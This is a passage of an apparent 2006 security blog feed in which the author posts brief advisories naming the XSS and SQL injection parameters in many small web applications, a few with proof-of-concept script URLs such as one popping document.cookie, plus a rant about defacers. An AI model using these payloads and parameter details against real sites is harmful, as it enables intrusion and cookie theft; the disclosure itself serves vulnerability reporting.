/&gt;ber=%22%3Cscript%3Ealert('r0t')%3C/script%3E&lt;br /&gt;&lt;br /&gt;mvnForum/activatemember?activatecode=%22%3Cscri&lt;br /&gt;pt%3Ealert(document.cookie)%3C/script%3E&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115111624687570845?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115111624687570845/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115111624687570845' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115111624687570845'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115111624687570845'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/mvnforum-xss-vuln.html' title='mvnForum  XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115111121019753929</id><published>2006-06-24T03:06:00.000+02:00</published><updated>2006-11-28T17:38:39.436+01:00</updated><title type='text'>UebiMiau Webmail XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 24 june 2006&lt;br /&gt;vendor:http://www.uebimiau.org/&lt;br /&gt;affected versions:2.7.10 ,2.7.2  and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;UebiMiau Webmail contains multiple flaws that allows a remote Cross-Site Scripting attacks.Input passed to the "f_user" parameter in "index.php" and input passed to the "pag" parameter in "messages.php" and input passed to the "lid","tid","sid" parameter in "error.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115111121019753929?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115111121019753929/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115111121019753929' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115111121019753929'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115111121019753929'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/uebimiau-webmail-xss-vuln.html' title='UebiMiau Webmail XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115110364087431693</id><published>2006-06-24T00:59:00.000+02:00</published><updated>2006-06-26T18:21:04.523+02:00</updated><title type='text'>Anthill SQL injection vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 24 june 2006&lt;br /&gt;vendor:http://anthill.vmlinuz.ca/&lt;br /&gt;affected versions:0.2.6 and 0.3.0 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;Anthill contains a flaw that allows a remote sql injection attacks.Input passed to the "order" parameter in "buglist.php" and input passed to the "bug" parameter in "query.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;note:&lt;br /&gt;Successful exploitation of the query.php script requires that "magic_quotes_gpc" is disabled.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115110364087431693?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115110364087431693/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115110364087431693' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115110364087431693'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115110364087431693'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/anthill-sql-injection-vuln.html' title='Anthill SQL injection vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115098297567967614</id><published>2006-06-22T15:27:00.000+02:00</published><updated>2006-06-22T15:29:36.013+02:00</updated><title type='text'>BNBT TrinEdit vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 22 june 2006&lt;br /&gt;vendor:http://bnbteasytracker.sourceforge.net/&lt;br /&gt;affected versions:7.7r3.2004.10.27 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;BNBT TrinEdit contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "filter" and "sort" parameter in "index.html" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;note: &lt;br /&gt;Its possible that BNBT EasyTracker 7.7r3.2004.10.27 have same problem.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115098297567967614?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115098297567967614/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115098297567967614' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115098297567967614'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115098297567967614'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/bnbt-trinedit-vuln.html' title='BNBT TrinEdit vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115091683204999307</id><published>2006-06-21T21:04:00.000+02:00</published><updated>2006-06-21T21:07:12.340+02:00</updated><title type='text'>Azureus &lt;=2.4.0.2 XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 21 june 2006&lt;br /&gt;vendor:http://azureus.sourceforge.net/&lt;br /&gt;affected versions:Azureus 2.4.0.2&lt;br /&gt;Azureus Tracker version 2.4.0.2/2.0&lt;br /&gt;and previos versions&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;Azureus : Java BitTorrent Client Tracker contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "search" parameter in "index.tmpl" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;example:&lt;br /&gt;http://host:6969/index.tmpl?search=%22%3Cscript%3Ealert('r0t')%3C/script%3E&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115091683204999307?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115091683204999307/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115091683204999307' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115091683204999307'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115091683204999307'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/azureus-2402-xss-vuln.html' title='Azureus &lt;=2.4.0.2 XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115090588069399353</id><published>2006-06-21T18:04:00.000+02:00</published><updated>2007-01-20T22:20:28.910+01:00</updated><title type='text'>Enterprise Groupware System XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 21 june 2006&lt;br /&gt;vendor:http://www.enterprisegroupwaresystem.org/&lt;br /&gt;affected versions:1.2.4 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;EGS contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "module" parameter in "index.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115090588069399353?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115090588069399353/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115090588069399353' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115090588069399353'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115090588069399353'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/enterprise-groupware-system-xss-vuln.html' title='Enterprise Groupware System XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115089458382917152</id><published>2006-06-21T14:56:00.000+02:00</published><updated>2006-07-13T20:12:55.486+02:00</updated><title type='text'>dev Vs def</title><content type='html'>While surfing i found one article from one developer (Jörg Stöber) ,a developer of  &lt;a href="http://www.content-builder.net/"&gt;Content*Builder&lt;/a&gt;.&lt;br /&gt;His wroten article title is - &lt;a href="http://www.content-builder.net/index.php?load=article2&amp;sub=full&amp;id=134&amp;openfolder=1"&gt;Defacing?!!&lt;/a&gt;&lt;br /&gt;He says that now he knows what means defacing.&lt;br /&gt;I suppose that he started recognize that stuff after &lt;a href="http://www.milw0rm.com/exploits/1914"&gt;Kacper&lt;/a&gt; had discovered multiple remote file include vuln. in Content*Builder. &lt;br /&gt;Whats happends later , you know if you will look at views count only in &lt;a href="http://www.milw0rm.com/webapps.php"&gt;milw0rm&lt;/a&gt;. &lt;br /&gt;Also as Jörg says that there was many deface attemps to sites wich use they software. &lt;br /&gt;Till that i understood his message cleary, but when he start to explain and teach about that stufff wich he knows some days only...And say that "script kidies" are use almost Opensource to find variables where including remote files arent properly santized.&lt;br /&gt;In that point Jörg,i dont like also defacers ... but almost software auditors dont have nothing together with defacers like " Hack3d by TurKish HacKerS t34m!!!", only thing is that most of webbaplication auditors/pentesters work is used to attack vuln. software using websites. &lt;br /&gt;And for a "Script Kidie" is easiest way to deface is using published POC , where he must only change from http://victim-host.com/vuln_file.php?include_path= to your host name. &lt;br /&gt;And i like developers like you ... who are dumb enough to code unsecure  and in that time also clever to teach/speak about security and give to people stattus wich kind of them can be used by yourself. &lt;br /&gt;If you was lame to code , than why you must now speak in that way,try to look at you source better and not speak as coder god, cauz its still have more mistakes as mine english.&lt;br /&gt;&lt;br /&gt;Knowlegde is power.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115089458382917152?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115089458382917152/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115089458382917152' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115089458382917152'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115089458382917152'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/dev-vs-def.html' title='dev Vs def'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115085589031753003</id><published>2006-06-21T04:11:00.000+02:00</published><updated>2006-12-22T02:35:55.733+01:00</updated><title type='text'>Ultimate eShop XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 21 june 2006&lt;br /&gt;vendor:http://www.ultimate-eshop.de/&lt;br /&gt;affected versions:1.00 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;Ultimate eShop contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "subid" parameter in "index.cgi" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115085589031753003?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115085589031753003/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115085589031753003' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115085589031753003'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115085589031753003'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/ultimate-eshop-xss-vuln.html' title='Ultimate eShop XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115085585841511759</id><published>2006-06-21T04:10:00.000+02:00</published><updated>2006-06-21T04:39:25.636+02:00</updated><title type='text'>phpTRADER Multiple SQL injection vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 21 june 2006&lt;br /&gt;vendor:&lt;br /&gt;www.bluehouse-project.de/index.php?area=1&amp;p=product&lt;br /&gt;affected versions:4.9 SP 5 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;phpTRADER contains a flaw that allows a remote sql injection attacks.Input passed to the "sectio" parameter in "login.php","write_newad.php","newad.php",&lt;br /&gt;"printad.php","askseller.php","browse.php",&lt;br /&gt;"showmemberads.php","note_ad.php","abuse.php",&lt;br /&gt;"buynow.php","confirm_newad.php"  and input passed to the "an" parameter in "printad.php","note_ad.php" and input passed to the "who" parameter in "showmemberads.php" and input passed to the "adnr" parameter in "buynow.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115085585841511759?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115085585841511759/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115085585841511759' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115085585841511759'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115085585841511759'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/phptrader-multiple-sql-injection-vuln.html' title='phpTRADER Multiple SQL injection vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115085581110842930</id><published>2006-06-21T04:09:00.001+02:00</published><updated>2006-06-21T04:10:11.186+02:00</updated><title type='text'>UltimateGoogle XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 21 june 2006&lt;br /&gt;vendor:www.thinkfactory.de/produkte/google/&lt;br /&gt;affected versions:1.00 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;UltimateGoogle contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "REQ" parameter in "index.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115085581110842930?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115085581110842930/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115085581110842930' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115085581110842930'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115085581110842930'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/ultimategoogle-xss-vuln.html' title='UltimateGoogle XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115085577911449570</id><published>2006-06-21T04:09:00.000+02:00</published><updated>2006-06-21T04:09:39.243+02:00</updated><title type='text'>thinkWMS SQL injection vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 21 june 2006&lt;br /&gt;vendor:www.thinkfactory.de/produkte/thinkWMS/&lt;br /&gt;affected versions:1.0 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;thinkWMS contains a flaw that allows a remote sql injection attacks.Input passed to the "id" parameter in "index.php","printarticle.php" and input passed to the "catid" parameter in "index.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115085577911449570?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115085577911449570/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115085577911449570' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115085577911449570'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115085577911449570'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/thinkwms-sql-injection-vuln.html' title='thinkWMS SQL injection vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115085573732239347</id><published>2006-06-21T04:08:00.000+02:00</published><updated>2006-06-21T04:08:57.416+02:00</updated><title type='text'>Ultimate Estate vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 21 june 2006&lt;br /&gt;vendor:www.thinkfactory.de/produkte/ultimate-estate/&lt;br /&gt;affected versions:1.0 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;1.&lt;br /&gt;Ultimate Estate contains a flaw that allows a remote sql injection attacks.Input passed to the "id" parameter in "index.pl" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;2.&lt;br /&gt;Ultimate Estate contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "cat" parameter in "index.pl" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115085573732239347?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115085573732239347/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115085573732239347' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115085573732239347'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115085573732239347'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/ultimate-estate-vuln.html' title='Ultimate Estate vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115085569885885458</id><published>2006-06-21T04:07:00.000+02:00</published><updated>2007-03-26T02:30:29.216+02:00</updated><title type='text'>Ultimate Auction XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 21 june 2006&lt;br /&gt;vendor:http://www.ultimate-auction.de/&lt;br /&gt;affected versions:1.0 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;Ultimate Auction contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "item" parameter in "emailtofriend.pl","violation.pl" and input passed to the "seller" parameter in "vsoa.pl" and input passed to the "user" parameter in "userask.pl","leavefeed.pl" and input passed to the "itemnum" parameter in "userask.pl" and input passed to the "category" parameter in "itemlist.pl" and input passed to the "query" parameter in "search.pl" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115085569885885458?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115085569885885458/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115085569885885458' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115085569885885458'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115085569885885458'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/ultimate-auction-xss-vuln.html' title='Ultimate Auction XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115085563686544154</id><published>2006-06-21T04:06:00.000+02:00</published><updated>2006-06-21T04:07:27.883+02:00</updated><title type='text'>FineShop vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 21 june 2006&lt;br /&gt;vendor:http://fineshop.pl/&lt;br /&gt;affected versions:3.0 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;1.&lt;br /&gt;FineShop contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "promocja","wysw","id_produc" parameter in "index.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;2.&lt;br /&gt;FineShop contains a flaw that allows a remote sql injection attacks.Input passed to the "produkt","id_produc","id_kat" parameter in "index.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div 